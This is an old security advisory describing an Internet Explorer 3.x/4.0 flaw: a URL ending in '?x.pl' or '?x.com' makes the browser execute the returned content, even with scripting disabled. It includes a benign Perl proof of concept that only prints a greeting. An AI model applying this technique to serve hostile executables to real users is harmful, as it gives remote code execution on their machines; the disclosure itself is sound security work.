COMMAND

    Microsoft Internet Explorer

SYSTEMS AFFECTED

    Systems running IE

PROBLEM

    Microsoft Internet Explorer (3.x and 4.0) thinks that URLs of  the
    form <http://...?x.y>  should have  the returned  content executed
    if the ".y" is a recognized file extension (like .COM (or .PL  for
    Perl users)).   This works  even if  "Enable ActiveX  controls and
    plug-ins" and  "Run ActiveX  scripts" are  turned off.   It  looks
    like  the  MIME  type  is  being  ignored  in  favor  of  the file
    extension.

    As an example of the bug in Perl (although it looks like it  works
    on any executable file (it was briefly tried it on .COM too)),  if
    you  have  .PL  defined  to  execute  Perl scripts on your machine
    (your Web browser machine), a URL like:

        <URL:http://fisherm.indy.tce.com:8001/cgi-bin/hello?hello.pl>

    where the "hello" Perl script on the server is:

        #!e:/mksnt/perl.exe
        print "Content-type: text/plain\n\n";
        print<<EOF;
        print "Content-type: text/plain\\n\\n";
        print "Hello, Jigsaw!\\n";
        sleep 10;
        EOF

    brings up  a window  on your  machine (your  Web browser machine!)
    for 10 seconds:

        Content-type: text/plain
        Hello, Jigsaw!

    This problem  was first  noted by  Brian Hoyt  (bkhoyt@us.ibm.com)
    and Simon Hewison in comp.infosystems.www.browsers.ms-windows.

SOLUTION

    Nothing yet.